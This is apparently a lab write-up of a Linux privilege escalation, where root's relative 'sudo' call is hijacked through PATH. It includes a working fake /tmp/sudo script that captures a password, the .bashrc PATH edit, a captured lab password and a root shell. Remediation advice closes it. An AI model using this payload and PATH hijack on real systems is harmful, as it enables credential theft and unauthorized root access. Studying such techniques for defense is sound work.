SSH key foothold, pspy sudo watch, and PATH password theft
Foundations Linux engagement: provided frank SSH key; pspy showed root running bare sudo; PATH hijack of sudo captured frank’s password for root.
- Case files
- SSH key foothold, pspy sudo watch, and PATH password theft
Frank’s private key opened SSH. Login-triggered sudo cat /etc/shadow without an absolute path; a fake /tmp/sudo on PATH logged the password for root su.
pspy revealed root’s relative sudo on SSH login.
Fake sudo captured the password; absolute sudo su completed root.
Engagement summary
Frank’s private key opened SSH. Login-triggered sudo cat /etc/shadow without an absolute path; a fake /tmp/sudo on PATH logged the password for root su.
EAVESDROPPER supplied an SSH private key for frank. After login, pspy64 showed UID 0 periodically executing sudo cat /etc/shadow — relative sudo, not /usr/bin/sudo. Planting /tmp/sudo that read a password prompt into /home/frank/pass.txt and prepending PATH=/tmp in ~/.bashrc caused the next SSH login to capture !@#frankisawesome2022%*. /usr/bin/sudo su with that secret returned root.
Business impact
Scripts that invoke sudo without an absolute path under a user-controlled PATH are credential theft. Use full paths in root automation, clear or reset PATH in privileged contexts, and monitor for unexpected binaries early in PATH.
Key login and process watch
pspy revealed root’s relative sudo on SSH login.
OPERATOR · SSH
savvy@lab:~$ chmod 600 id_rsa && ssh frank@10.10.10.50 -i id_rsa
savvy@lab:~$
savvy@lab:~$ scp -i id_rsa pspy64 frank@10.10.10.50:.
savvy@lab:~$ chmod +x pspy64 && ./pspy64
CMD: UID=0 PID=662 | sudo cat /etc/shadow
PATH sudo hijack to root
Fake sudo captured the password; absolute sudo su completed root.
PAYLOAD
/tmp/sudo
#!/bin/bash
read -p "Password: " password
echo "$password" > /home/frank/pass.txtOPERATOR · ROOT
savvy@lab:~$ chmod +x /tmp/sudo
savvy@lab:~$ sed -i '4iPATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin' ~/.bashrc && exit
savvy@lab:~$ ssh frank@10.10.10.50 -i id_rsa
savvy@lab:~$ cat /home/frank/pass.txt
!@#frankisawesome2022%*
savvy@lab:~$ /usr/bin/sudo su
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Rewrite login hooks to call /usr/bin/sudo with a secure_path. Restrict write to directories early in PATH. Prefer key-only root escalation without password prompts in automation.